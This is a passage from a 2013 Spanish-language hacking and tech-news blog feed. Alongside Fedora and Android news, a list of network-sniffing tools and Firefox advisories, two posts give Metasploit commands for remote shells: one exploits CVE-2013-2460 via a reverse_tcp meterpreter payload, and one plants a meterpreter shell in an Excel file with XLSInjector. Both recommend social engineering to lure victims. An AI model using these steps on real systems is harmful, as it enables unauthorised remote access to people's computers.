src="http://1.bp.blogspot.com/-ewzSd49-czg/UGaMGv1iJYI/AAAAAAAAAZk/oUq24ooSu5g/s200/hi-256-0-0485206a7199725302f0156f14a9f7a683df9336.png" width="80" /&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;Nombre:&lt;b&gt; ArpSpoof&lt;/b&gt;&lt;br /&gt;Pagina Oficial: &lt;a href="https://github.com/robquad/Arpspoof"&gt;https://github.com/robquad/Arpspoof&lt;/a&gt;&lt;br /&gt;Descripción: Herramienta para envenenamiento de las tablas ARP&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&lt;img height="80" src="http://faceniff.ponury.net/icon_256.png" width="80" /&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;Nombre:&lt;b&gt; FaceNiff&lt;/b&gt;&lt;br /&gt;Pagina Oficial: &lt;a href="http://faceniff.ponury.net/"&gt;http://faceniff.ponury.net/&lt;/a&gt;&lt;br /&gt;Descripción: Capturadpr de sesiones en redes Wifi&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&lt;img alt="http://www.cubiccodes.com/wp-content/uploads/2013/05/nmap.png" class="decoded" height="80" src="http://www.cubiccodes.com/wp-content/uploads/2013/05/nmap.png" width="80" /&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;Nombre:&lt;b&gt; aNMAP (NMAP)&lt;/b&gt;&lt;br /&gt;Pagina Oficial: &lt;a href="https://code.google.com/p/anmap/"&gt;https://code.google.com/p/anmap&lt;/a&gt;&lt;br /&gt;Descripción: Escáner de redes&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&lt;img itemprop="image" src="https://lh6.ggpht.com/kpds-xsD0qZtNNDbSBSu-lR7tRUZ66YALxgean86mpse6FJu67Ym8kPGpRmHJqxj8mVG=w124" /&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;br /&gt;Nombre:&lt;b&gt; ConnectBOT&lt;/b&gt;&lt;br /&gt;Pagina Oficial: &lt;a href="https://code.google.com/p/connectbot/"&gt;https://code.google.com/p/connectbot/&lt;/a&gt;&lt;br /&gt;Descripción: Cliente SSH para Android&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&lt;/pre&gt;&lt;pre&gt;&lt;img height="80" src="https://lh5.ggpht.com/uct9IFVW_0-2_Uwen37whbVnf9putuOjY-s3vUwclpvb9COdAoVEwCthAGjQYDJ6c1k=w124" width="80" /&gt;&lt;/pre&gt;&lt;pre&gt;&lt;/pre&gt;&lt;pre&gt;Nombre:&lt;b&gt; SSHDroid&lt;/b&gt;&lt;br /&gt;Pagina Oficial: &lt;a href="http://forum.xda-developers.com/showthread.php?t=921801"&gt;http://forum.xda-developers.com/&lt;/a&gt;&lt;br /&gt;Descripción: Servidor SSH para Android&lt;/pre&gt;&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;&lt;img height="80" src="https://lh6.ggpht.com/6bd6mh8FpP7zbG7xT_KC6JowRgnT8ncqWyVOJA76uMjCu011y36xeMU6Jd0snrSE5g=w124" width="80" /&gt;&amp;nbsp;&lt;/pre&gt;&lt;pre&gt;Nombre:&lt;b&gt; VMWare View&lt;/b&gt;&lt;br /&gt;Pagina Oficial: &lt;a href="https://play.google.com/store/apps/details?id=com.vmware.view.client.android"&gt;Google Play (VMWare View)&lt;/a&gt;&lt;br /&gt;Descripción: Visor de máquinas virtuales en plataformas VMware&lt;/pre&gt;&lt;br /&gt;Esto seguirá creciendo poco a poco, quisiera agradecer a un par de amigos que me ayudaron con la creación de este post, un saludo para &lt;a href="https://twitter.com/Mazt0r"&gt;&lt;b&gt;@Mazt0r&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://twitter.com/Mackaber"&gt;&lt;b&gt;@Mackaber&lt;/b&gt;&lt;/a&gt; ;);)</description><link>http://kode-labs.blogspot.com/2013/07/hacking-en-android-descubre-estas.html</link><author>noreply@blogger.com (Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://3.bp.blogspot.com/-HGTv1zrcOaA/UJQCo1KSwZI/AAAAAAAAAg8/Hnns_EGHfTI/s72-c/ic_launcher.png" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-2494412881455602310</guid><pubDate>Wed, 03 Jul 2013 15:44:00 +0000</pubDate><atom:updated>2013-07-03T20:51:00.388-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Vulnerabilidades</category><title>Vulnerabilidad Java: CVE-2013-2460</title><description>&lt;i&gt;&lt;b&gt;CVE-2013-2460 Java Applet ProviderSkeleton Insecure Invoke Method&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Este  módulo de Metasploit abusa el método inseguro &lt;i&gt;invoke()&lt;/i&gt; de la clase de &lt;i&gt;ProviderSkeleton&lt;/i&gt; que permite para llamar a métodos estáticos arbitrarios  con argumentos de usuario. La vulnerabilidad afecta a la versión &lt;i&gt;Java  7u21&lt;/i&gt; y versiones anteriores.&lt;br /&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img" src="https://lh4.googleusercontent.com/-a8AgeOUowzQ/UdRBoBSCxKI/AAAAAAAABzE/fTin1k6_ba4/w700-h371-no/CVE-2013-2460.png" /&gt;&lt;br /&gt;Explotando la vulnerabilidad con Metasploit.&lt;br /&gt;&lt;br /&gt;&lt;textarea style="height: 252px; width: 692px;"&gt;// Utilizamos el Exploit //  msf &gt; use exploit/multi/browser/java_jre17_provider_skeleton  // Seleccionamos el Payload //  ﻿msf exploit(java_jre17_provider_skeleton) &gt; set PAYLOAD java/meterpreter/reverse_tcp  ﻿msf exploit(java_jre17_provider_skeleton) &gt; set LHOST [IP Local]  msf exploit(java_jre17_provider_skeleton) &gt; set srvhost [IP Local]  msf exploit(java_jre17_provider_skeleton) &gt; set uripath /  msf exploit(java_jre17_provider_skeleton) &gt; exploit&lt;/textarea&gt;&lt;br /&gt;&lt;br /&gt;Solo quedaría utilizar &lt;i&gt;Ingeniería Social &lt;/i&gt;y enviar la dirección generada por &lt;i&gt;Metasploit&lt;/i&gt; para obtener nuestra sesión de &lt;i&gt;Meterpreter&lt;/i&gt; ;);)&lt;br /&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img" src="https://lh3.googleusercontent.com/-Y0ZtWWAKO1A/UdRBoEAq2EI/AAAAAAAABzI/nRsIvjcMJ6w/w700-h136-no/CVE-2013-2460_.png" /&gt;&lt;br /&gt;Source - &lt;a href="http://underc0de.org/foro/hacking-basico/cve-2013-2460"&gt;&lt;i&gt;&lt;b&gt;Underc0de&lt;/b&gt; &lt;/i&gt;&lt;/a&gt;</description><link>http://kode-labs.blogspot.com/2013/07/vulnerabilidad-java-cve-2013-2460.html</link><author>noreply@blogger.com (Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://lh4.googleusercontent.com/-a8AgeOUowzQ/UdRBoBSCxKI/AAAAAAAABzE/fTin1k6_ba4/s72-w700-h371-c-no/CVE-2013-2460.png" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-3430541534549009726</guid><pubDate>Wed, 03 Jul 2013 13:51:00 +0000</pubDate><atom:updated>2013-07-03T09:23:10.500-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Linux</category><title>Fedora 19 "Schrödinger's Cat" está disponible</title><description>&lt;div style="text-align: center;"&gt;&lt;img alt="" class="bbc_img" height="200" src="http://4.bp.blogspot.com/-d1AnzpEHw7I/UBjBELZd5gI/AAAAAAAAAGM/OS7qTH9jV70/s200/Fedora.png" width="200" /&gt;&lt;/div&gt;&lt;br /&gt;Como lo dice el título de la entrada ya se encuentra disponible la &lt;i&gt;versión 19 de Fedora&lt;/i&gt; bajo el nombre código de: &lt;i&gt;Schrödinger's Cat&lt;/i&gt;.&lt;br /&gt;&lt;br /&gt;Para ver las notas de cambios, pueden visitar la pagina oficial:&lt;br /&gt;&lt;a class="bbc_link" href="http://docs.fedoraproject.org/en-US/Fedora/19/html/Release_Notes/" target="_blank"&gt;http://docs.fedoraproject.org/en-US/Fedora/19/html/Release_Notes/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Descargas:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Fedora 19 (Gnome)&lt;/b&gt;: &lt;a class="bbc_link" href="http://download.fedoraproject.org/pub/fedora/linux/releases/19/Live/i386/Fedora-Live-Desktop-i686-19-1.iso" target="_blank"&gt;32 Bits&lt;/a&gt; | &lt;a class="bbc_link" href="http://download.fedoraproject.org/pub/fedora/linux/releases/19/Live/x86_64/Fedora-Live-Desktop-x86_64-19-1.iso" target="_blank"&gt;64 Bits&lt;/a&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="240" src="http://fedoraproject.org/static/images/screenshots/full-desktop-ss-gnome.png" width="320" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Fedora 19 (KDE)&lt;/b&gt;: &lt;a class="bbc_link" href="http://download.fedoraproject.org/pub/fedora/linux/releases/19/Live/i386/Fedora-Live-KDE-i686-19-1.iso" target="_blank"&gt;32 Bits&lt;/a&gt; | &lt;a class="bbc_link" href="http://download.fedoraproject.org/pub/fedora/linux/releases/19/Live/x86_64/Fedora-Live-KDE-x86_64-19-1.iso" target="_blank"&gt;64 Bits&lt;/a&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="240" src="http://fedoraproject.org/static/images/screenshots/full-desktop-ss-kde.png" width="320" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Fedora 19 (LXDE)&lt;/b&gt;: &lt;a class="bbc_link" href="http://download.fedoraproject.org/pub/alt/releases/19/Spins/i386/Fedora-Live-LXDE-i686-19-1.iso" target="_blank"&gt;32 Bits&lt;/a&gt; | &lt;a class="bbc_link" href="http://download.fedoraproject.org/pub/alt/releases/19/Spins/x86_64/Fedora-Live-LXDE-x86_64-19-1.iso" target="_blank"&gt;64 Bits&lt;/a&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="240" src="http://fedoraproject.org/static/images/screenshots/full-desktop-ss-lxde.png" width="320" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Fedora 19 (XFCE)&lt;/b&gt;: &lt;a class="bbc_link" href="http://download.fedoraproject.org/pub/alt/releases/19/Spins/i386/Fedora-Live-XFCE-i686-19-1.iso" target="_blank"&gt;32 Bits&lt;/a&gt; | &lt;a class="bbc_link" href="http://download.fedoraproject.org/pub/alt/releases/19/Spins/x86_64/Fedora-Live-XFCE-x86_64-19-1.iso" target="_blank"&gt;64 Bits&lt;/a&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="240" src="http://fedoraproject.org/static/images/screenshots/full-desktop-ss-xfce.png" width="320" /&gt; </description><link>http://kode-labs.blogspot.com/2013/07/fedora-19-schrodingers-cat-esta.html</link><author>noreply@blogger.com (Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://4.bp.blogspot.com/-d1AnzpEHw7I/UBjBELZd5gI/AAAAAAAAAGM/OS7qTH9jV70/s72-c/Fedora.png" width="72"/><enclosure length="687865856" type="application/octet-stream" url="http://download.fedoraproject.org/pub/alt/releases/19/Spins/i386/Fedora-Live-LXDE-i686-19-1.iso"/><itunes:explicit/><itunes:subtitle>Como lo dice el título de la entrada ya se encuentra disponible la versión 19 de Fedora bajo el nombre código de: Schrödinger's Cat. Para ver las notas de cambios, pueden visitar la pagina oficial: http://docs.fedoraproject.org/en-US/Fedora/19/html/Release_Notes/ Descargas: Fedora 19 (Gnome): 32 Bits | 64 Bits Fedora 19 (KDE): 32 Bits | 64 Bits Fedora 19 (LXDE): 32 Bits | 64 Bits Fedora 19 (XFCE): 32 Bits | 64 Bits</itunes:subtitle><itunes:author>noreply@blogger.com (Kodeinfect)</itunes:author><itunes:summary>Como lo dice el título de la entrada ya se encuentra disponible la versión 19 de Fedora bajo el nombre código de: Schrödinger's Cat. Para ver las notas de cambios, pueden visitar la pagina oficial: http://docs.fedoraproject.org/en-US/Fedora/19/html/Release_Notes/ Descargas: Fedora 19 (Gnome): 32 Bits | 64 Bits Fedora 19 (KDE): 32 Bits | 64 Bits Fedora 19 (LXDE): 32 Bits | 64 Bits Fedora 19 (XFCE): 32 Bits | 64 Bits</itunes:summary><itunes:keywords>Linux</itunes:keywords></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-7650649678200307591</guid><pubDate>Sat, 29 Jun 2013 14:18:00 +0000</pubDate><atom:updated>2013-06-29T09:50:39.899-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><title>Android 4.3 JB en tu Samsung Galaxy S4</title><description>&lt;div style="text-align: center;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-NGENmbpM3IU/Uc7st18nT7I/AAAAAAAAAzk/sATvVZXakoc/s1160/Screenshot_2013-06-28-10-34-451.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-NGENmbpM3IU/Uc7st18nT7I/AAAAAAAAAzk/sATvVZXakoc/s400/Screenshot_2013-06-28-10-34-451.jpg" width="372" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;El archivo filtrado en cuestión &lt;i&gt;corresponde a una ROM Android 4.3  Jelly Bean&lt;/i&gt; solo y exclusívamente para los Google Play Editions. Sin  embargo,&lt;b&gt; los chicos de SamMobile han modificado ligeramente dicha ROM para hacerla compatible con el Samsung Galaxy S4 LTE (GT-I9505)&lt;/b&gt;, permitiendo a todos sus usuarios instalarla y flashearla en sus smartphones.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;b&gt;Necesitaremos&lt;/b&gt;:&lt;i&gt;&lt;b&gt;&lt;span style="line-height: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;span style="line-height: 13px;"&gt;· Terminal Rooteado&lt;/span&gt;&lt;i&gt;&lt;b&gt;&lt;span style="line-height: 13px;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;· ROM en la tarjeta SD&lt;/div&gt;&lt;div style="text-align: left;"&gt;· Iniciar en modo recovery (&lt;i&gt;Encendido / Volumen+ / Home&lt;/i&gt;)&lt;/div&gt;&lt;div style="text-align: left;"&gt;· Realizar todos los wipes&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: left;"&gt;· Flashear la ROM &lt;/div&gt;&lt;div style="text-align: left;"&gt;· Reiniciar&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Descarga de Roms&lt;/b&gt;: &lt;br /&gt;&lt;a href="http://hotfile.com/dl/231183524/63eb153/Android-4.3-I9505GUEUBMFP-Odexed-I9505.zip.html"&gt;Android-4.3-I9505GUEUBMFP-Odexed-I9505.zip&lt;/a&gt;&lt;br /&gt;&lt;i&gt;MD5: 363ED9CC32A841A512E72372A19C7D05&lt;/i&gt;&lt;br /&gt;&lt;a href="http://hotfile.com/dl/231185386/846ba4b/Android-4.3-I9505GUEUBMFP-Deodexed-I9505.zip.html"&gt;Android-4.3-I9505GUEUBMFP-Deodexed-I9505.zip&lt;/a&gt;&lt;br /&gt;&lt;i&gt;MD5: 74D241B64266220161018EB98A19F279&lt;/i&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;Respecto a las novedades de esta versión, &lt;i&gt;se habla de una mejor  respuesta, mejor gestión de la memoria RAM (se habla de un 30% de  ahorro), mejoras en la autonomía de la batería (cosa que me sorprende  cuando lleva filtrada solo tres horas) y algunas nuevas opciones en el  apartado del Wi-Fi.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Screenshots&lt;/b&gt;:&lt;br /&gt;&lt;img alt="http://www.sammobile.com/wp-content/uploads/2013/06/Screenshot_2013-06-28-10-25-141.jpg" class="decoded" height="320" src="http://www.sammobile.com/wp-content/uploads/2013/06/Screenshot_2013-06-28-10-25-141.jpg" width="179" /&gt;&lt;img alt="http://www.sammobile.com/wp-content/uploads/2013/06/Screenshot_2013-06-28-10-27-241.jpg" class="decoded" height="320" src="http://www.sammobile.com/wp-content/uploads/2013/06/Screenshot_2013-06-28-10-27-241.jpg" width="179" /&gt;&lt;img alt="http://www.sammobile.com/wp-content/uploads/2013/06/Screenshot_2013-06-28-10-27-391.jpg" class="decoded" height="320" src="http://www.sammobile.com/wp-content/uploads/2013/06/Screenshot_2013-06-28-10-27-391.jpg" width="179" /&gt;&lt;br /&gt;&lt;img alt="http://www.sammobile.com/wp-content/uploads/2013/06/Screenshot_2013-06-28-10-29-021.jpg" class="decoded" height="320" src="http://www.sammobile.com/wp-content/uploads/2013/06/Screenshot_2013-06-28-10-29-021.jpg" width="179" /&gt;&lt;img alt="http://www.sammobile.com/wp-content/uploads/2013/06/Screenshot_2013-06-28-10-29-211.jpg" class="decoded" height="320" src="http://www.sammobile.com/wp-content/uploads/2013/06/Screenshot_2013-06-28-10-29-211.jpg" width="179" /&gt;&lt;img alt="http://www.sammobile.com/wp-content/uploads/2013/06/Screenshot_2013-06-28-10-34-371.jpg" class="decoded" height="320" src="http://www.sammobile.com/wp-content/uploads/2013/06/Screenshot_2013-06-28-10-34-371.jpg" width="179" /&gt;&lt;/div&gt;&lt;br /&gt;Fuente: &lt;a href="http://www.sammobile.com/" target="_blank"&gt;&lt;b&gt;SamMovile&lt;/b&gt;&lt;/a&gt;</description><link>http://kode-labs.blogspot.com/2013/06/android-43-jb-en-tu-samsung-galaxy-s4.html</link><author>noreply@blogger.com (Kodeinfect)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://2.bp.blogspot.com/-NGENmbpM3IU/Uc7st18nT7I/AAAAAAAAAzk/sATvVZXakoc/s72-c/Screenshot_2013-06-28-10-34-451.jpg" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-2258594017231092516</guid><pubDate>Wed, 26 Jun 2013 23:06:00 +0000</pubDate><atom:updated>2013-06-26T18:36:31.471-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>XSLInjector: Shell Meterpreter en archivos Excel</title><description>Como lo dice el titulo de la entrada, esta herramienta nos permite inyectar en un archivo &lt;b&gt;XLS&lt;/b&gt; de &lt;i&gt;Microsoft Excel&lt;/i&gt; una consola &lt;i&gt;meterpreter&lt;/i&gt;, permitiéndonos el acceso y la ejecución de código remoto en otro equipo.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Requerimientos&lt;/b&gt;:&lt;br /&gt;&lt;i&gt;· Microsoft Excel&lt;br /&gt;· &lt;a href="http://www.activestate.com/activeperl/"&gt;Perl&lt;/a&gt;&amp;nbsp;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;· Modulo &lt;a href="http://search.cpan.org/CPAN/authors/id/J/JD/JDB/Win32-OLE-0.1709.tar.gz"&gt;Win32:OLE&lt;/a&gt;&lt;br /&gt;· Archivo XML a infectar&lt;br /&gt;· &lt;a class="bbc_link" href="http://code.google.com/p/xlsinjector/" target="_blank"&gt;XLSInjector&lt;/a&gt;&lt;br /&gt;· &lt;a href="http://www.metasploit.com/"&gt;Metasploit Framework&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Para hacer uso de la herramienta, ejecutaremos el siguiente comando:&lt;br /&gt;&lt;br /&gt;&lt;textarea style="height: 22px; width: 641px;"&gt;perl xlsinjector.pl -i ArchivoExcel.xls -o ArchivoResultante.xls&lt;/textarea&gt;&lt;br /&gt;&lt;br /&gt;Donde &lt;b&gt;ArchivoExcel.xls&lt;/b&gt; es el archivo original y &lt;b&gt;ArchivoResultante.xls&lt;/b&gt; será el nombre del archivo final que tendrá ya nuestra &lt;i&gt;shell&lt;/i&gt;.&lt;br /&gt;&lt;br /&gt;Pero no todo es tan simple con esta herramienta, resulta que &lt;i&gt;XLSInjector&lt;/i&gt; &lt;b&gt;NO&lt;/b&gt; salta los filtros de scripting puestos por Microsoft en su suite  ofimática, por lo que toca convencer, por medio de ingeniería social o  cualquier otra técnica que el mismo usuario ponga la seguridad de las  macros en baja y que “confié” en los proyectos de VB, algo complicado  pero que seguro con algo de presunción se consigue que realicen estas  tareas.&lt;br /&gt;&lt;br /&gt;Suponiendo que ya se realizaron las configuraciones  adecuadas para el correcto funcionamiento del XLSInjector vamos a  acceder remotamente a nuestra shell meterpreter mediante la consola del  &lt;i&gt;Metasploit Framework&lt;/i&gt;.&lt;br /&gt;&lt;br /&gt;Iniciamos la consola del &lt;i&gt;metasploit&lt;/i&gt; y configuramos:&lt;br /&gt;&lt;br /&gt;&lt;textarea style="height: 67px; width: 645px;"&gt;set payload windows/meterpreter/bind_tcp set RHOST ipdelpcvictima set RPOT 4444 exploit&lt;/textarea&gt;&lt;br /&gt;&lt;br /&gt;Source: &lt;a href="http://www.dragonjar.org/xlsinjector-inyectar-shell-meterpreter-archivos-excel.xhtml"&gt;DragonJAR&lt;/a&gt;</description><link>http://kode-labs.blogspot.com/2013/06/xslinjector-shell-meterpreter-en.html</link><author>noreply@blogger.com (Kodeinfect)</author><enclosure length="124289" type="application/x-gzip" url="http://search.cpan.org/CPAN/authors/id/J/JD/JDB/Win32-OLE-0.1709.tar.gz"/><itunes:explicit/><itunes:subtitle>Como lo dice el titulo de la entrada, esta herramienta nos permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter, permitiéndonos el acceso y la ejecución de código remoto en otro equipo. Requerimientos: · Microsoft Excel · Perl&amp;nbsp; · Modulo Win32:OLE · Archivo XML a infectar · XLSInjector · Metasploit Framework Para hacer uso de la herramienta, ejecutaremos el siguiente comando: perl xlsinjector.pl -i ArchivoExcel.xls -o ArchivoResultante.xls Donde ArchivoExcel.xls es el archivo original y ArchivoResultante.xls será el nombre del archivo final que tendrá ya nuestra shell. Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que “confié” en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas. Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework. Iniciamos la consola del metasploit y configuramos: set payload windows/meterpreter/bind_tcp set RHOST ipdelpcvictima set RPOT 4444 exploit Source: DragonJAR</itunes:subtitle><itunes:author>noreply@blogger.com (Kodeinfect)</itunes:author><itunes:summary>Como lo dice el titulo de la entrada, esta herramienta nos permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter, permitiéndonos el acceso y la ejecución de código remoto en otro equipo. Requerimientos: · Microsoft Excel · Perl&amp;nbsp; · Modulo Win32:OLE · Archivo XML a infectar · XLSInjector · Metasploit Framework Para hacer uso de la herramienta, ejecutaremos el siguiente comando: perl xlsinjector.pl -i ArchivoExcel.xls -o ArchivoResultante.xls Donde ArchivoExcel.xls es el archivo original y ArchivoResultante.xls será el nombre del archivo final que tendrá ya nuestra shell. Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que “confié” en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas. Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework. Iniciamos la consola del metasploit y configuramos: set payload windows/meterpreter/bind_tcp set RHOST ipdelpcvictima set RPOT 4444 exploit Source: DragonJAR</itunes:summary><itunes:keywords>Hacking</itunes:keywords></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-6328126791645223367</guid><pubDate>Wed, 26 Jun 2013 15:24:00 +0000</pubDate><atom:updated>2013-06-26T10:54:29.345-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Noticias</category><title>14 Vulnerabilidades corregidas en Firefox 22</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-UApGT8sJ3S4/UcsHmqqvNvI/AAAAAAAAAzU/ye4MoSlg2sw/s1600/Mozilla_Firefox_Logo_mit_Schriftzug.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="152" src="http://1.bp.blogspot.com/-UApGT8sJ3S4/UcsHmqqvNvI/AAAAAAAAAzU/ye4MoSlg2sw/s400/Mozilla_Firefox_Logo_mit_Schriftzug.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Mozilla&lt;/b&gt; a corregido 14 vulnerabilidades en &lt;b&gt;Firefox&lt;/b&gt;, incluyendo &lt;i&gt;cuatro&lt;/i&gt; (&lt;b&gt;4&lt;/b&gt;) de nivel critico que &lt;i&gt;permitirían la ejecución de código remoto&lt;/i&gt;. &lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;También hay &lt;i&gt;seis &lt;/i&gt;(&lt;b&gt;6&lt;/b&gt;)&lt;/span&gt; &lt;span class="hps"&gt;vulnerabilidades&lt;/span&gt; &lt;span class="hps"&gt;de alta&lt;/span&gt; &lt;span class="hps"&gt;gravedad&lt;/span&gt; &lt;span class="hps"&gt;que ya fueron solucionadas en la versión 22 del conocido explorador.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Acá está la lista de las vulnerabilidades corregidas por &lt;i&gt;Mozilla&lt;/i&gt;&lt;/b&gt;.&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-62.html"&gt;MFSA 2013-62&lt;/a&gt;&amp;nbsp;&lt;i&gt;Inaccessible updater can lead to local privilege escalation&lt;/i&gt;&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-61.html"&gt;MFSA 2013-61&lt;/a&gt;&amp;nbsp;&lt;i&gt;Homograph domain spoofing in .com, .net and .name&lt;/i&gt;&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-60.html"&gt;MFSA 2013-60&lt;/a&gt;&amp;nbsp;&lt;i&gt;getUserMedia permission dialog incorrectly displays location&lt;/i&gt;&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-59.html"&gt;MFSA 2013-59&lt;/a&gt;&amp;nbsp;&lt;i&gt;XrayWrappers can be bypassed to run user defined methods in a privileged context&lt;/i&gt;&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-58.html"&gt;MFSA 2013-58&lt;/a&gt;&amp;nbsp;&lt;i&gt;X-Frame-Options ignored when using server push with multi-part responses&lt;/i&gt;&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-57.html"&gt;MFSA 2013-57&lt;/a&gt;&amp;nbsp;&lt;i&gt;Sandbox restrictions not applied to nested frame elements&lt;/i&gt;&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-56.html"&gt;MFSA 2013-56&lt;/a&gt;&amp;nbsp;&lt;i&gt;PreserveWrapper has inconsistent behavior&lt;/i&gt;&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-55.html"&gt;MFSA 2013-55&lt;/a&gt;&amp;nbsp;&lt;i&gt;SVG filters can lead to information disclosure&lt;/i&gt;&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-54.html"&gt;MFSA 2013-54&lt;/a&gt;&amp;nbsp;&lt;i&gt;Data in the body of XHR HEAD requests leads to CSRF attacks&lt;/i&gt;&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-53.html"&gt;MFSA 2013-53&lt;/a&gt;&amp;nbsp;&lt;i&gt;Execution of unmapped memory through onreadystatechange event&lt;/i&gt;&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-52.html"&gt;MFSA 2013-52&lt;/a&gt;&amp;nbsp;&lt;i&gt;Arbitrary code execution within Profiler&lt;/i&gt;&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-51.html"&gt;MFSA 2013-51&lt;/a&gt;&amp;nbsp;&lt;i&gt;Privileged content access and execution via XBL&lt;/i&gt;&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-50.html"&gt;MFSA 2013-50&lt;/a&gt;&amp;nbsp;&lt;i&gt;Memory corruption found using Address Sanitizer&lt;/i&gt;&lt;br /&gt;&lt;a href="https://www.mozilla.org/security/announce/2013/mfsa2013-49.html"&gt;MFSA 2013-49&lt;/a&gt;&amp;nbsp;&lt;i&gt;Miscellaneous memory safety hazards (rv:22.0 / rv:17.0.7)&lt;/i&gt;</description><link>http://kode-labs.blogspot.com/2013/06/14-vulnerabilidades-corregidas-en.html</link><author>noreply@blogger.com 